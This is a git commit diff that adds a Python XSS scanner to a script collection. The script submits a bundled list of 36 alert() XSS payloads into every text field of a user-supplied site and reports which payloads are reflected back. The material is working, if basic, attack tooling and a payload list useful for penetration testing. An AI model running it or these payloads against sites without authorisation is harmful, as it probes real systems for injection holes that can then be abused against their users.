Merge pull request #199 from Ninjavin/xss-scanner-ninjavin

tejan-singh · web-flow · commit ca316431fe4b · 2020-11-01T03:06:02.000+05:30
Xss scanner ninjavin
diff --git a/Python/XSS-Check/README.md b/Python/XSS-Check/README.md
@@ -0,0 +1,12 @@
+# Description
+
+A Python Script to exploit XSS Vulnerability of a URL.
+
+## How to execute this Script
+
++ Run `pip install -r requirements.txt` to install the required packages.
++ Run the script using `python3 XSS-Check.py`
+
+## Example
+
+![image](images/xss-check.png)
diff --git a/Python/XSS-Check/XSS-Check.py b/Python/XSS-Check/XSS-Check.py
@@ -0,0 +1,51 @@
+import requests
+from bs4 import BeautifulSoup
+from urllib.parse import urljoin
+from colorama import Fore, init, Style
+from progress.bar import ChargingBar
+init(autoreset=True)
+# Get all forms of the mentioned URL
+def getAllForms(url):
+    page = requests.get(url)
+    parser = BeautifulSoup(page.content, 'html.parser')
+    return parser.find_all('form')
+f = open("payloads.txt", "r").readlines()
+successful_payloads = []
+def xss():
+    forms = getAllForms(url)
+    for form in forms:
+        # Getting Payload Scripts for Payloads file
+        bar = ChargingBar(Fore.GREEN + 'Injecting Scripts and finding XSS Vulnerability', max=36)
+        for payload in f:
+            bar.next()
+            # Getting the URL where the form data will be sent
+            action = form.attrs.get('action').lower()
+            finalURL = urljoin(url, action)
+            # Getting the Method through which form data will be sent (GET/POST)
+            # By default, the method is GET
+            method = form.attrs.get('method', 'get').lower()
+            # Filling the Form with Random Data basically the script from Payloads
+            randomData = {}
+            for input in form.find_all('input'):
+                if input['type'] == 'text' or input['type'] == 'search':
+                    input['value'] = payload
+                inputName = input.get('name')
+                inputValue = input.get('value') 
+                if inputName and inputValue:
+                    randomData[inputName] = inputValue
+            if method=='post':
+                content = requests.post(finalURL, data=randomData)
+            else:
+                content = requests.get(finalURL, params=randomData)
+            # Return True if Payload was successfully Injected
+            if payload in content.text:
+                successful_payloads.append(payload)
+        bar.finish()
+url = input(Fore.BLUE + "\nEnter the URL: ")
+vulnerable = xss()
+if len(successful_payloads):
+    print(Fore.GREEN + "\nSite is vulnerable to XSS Attack!\n")
+    for i in successful_payloads:
+        print(Fore.CYAN + "Payload Injected Successfully --> " + Fore.YELLOW + i)
+else:
+	print(Fore.RED + Style.BRIGHT + "\nXSS Vulnerability not Present!")
diff --git a/Python/XSS-Check/images/xss-check.png b/Python/XSS-Check/images/xss-check.png
diff --git a/Python/XSS-Check/payloads.txt b/Python/XSS-Check/payloads.txt
@@ -0,0 +1,36 @@
+<body onafterprint=alert(1)>
+<style>@keyframes x{}</style><xss style="animation-name:x" onanimationend="alert(1)"></xss>
+<style>@keyframes slidein {}</style><xss style="animation-duration:1s;animation-name:slidein;animation-iteration-count:2" onanimationiteration="alert(1)"></xss>
+<style>@keyframes x{}</style><xss style="animation-name:x" onanimationstart="alert(1)"></xss>
+<svg><animate onbegin=alert(1) attributeName=x dur=1s>
+<audio oncanplay=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
+<video oncanplaythrough=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
+<body onhashchange="alert(1)">
+<body onload=alert(1)>
+<audio onloadeddata=alert(1)><source src="validaudio.wav" type="audio/wav"></audio>
+<body onpageshow=alert(1)>
+<body onresize="alert(1)">
+<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
+<details ontoggle=alert(1) open>test</details>
+<input onauxclick=alert(1)>
+<a onbeforecopy="alert(1)" contenteditable>test</a>
+<a onbeforecut="alert(1)" contenteditable>test</a>
+<input onchange=alert(1) value=xss>
+<xss onclick="alert(1)">test</xss>
+<xss onkeydown="alert(1)" contenteditable>test</xss>
+<xss onmousedown="alert(1)">test</xss>
+<form onsubmit=alert(1)><input type=submit>
+<script>alert(123);</script>
+<ScRipT>alert("XSS");</ScRipT>
+<script>alert(123)</script>
+<script>alert("HACKED");</script>
+<script>alert(“XSS”)</script> 
+<script>alert(“XSS”);</script>
+<script>alert(‘XSS’)</script>
+“><script>alert(“XSS”)</script>
+<script>alert(/XSS”)</script>
+<script>alert(/XSS/)</script>
+</script><script>alert(1)</script>
+‘; alert(1);
+‘)alert(1);//
+<ScRiPt>alert(1)</sCriPt>
diff --git a/Python/XSS-Check/requirements.txt b/Python/XSS-Check/requirements.txt
@@ -0,0 +1,4 @@
+bs4==0.0.1
+colorama==0.4.3
+progress==1.5
+requests==2.24.0
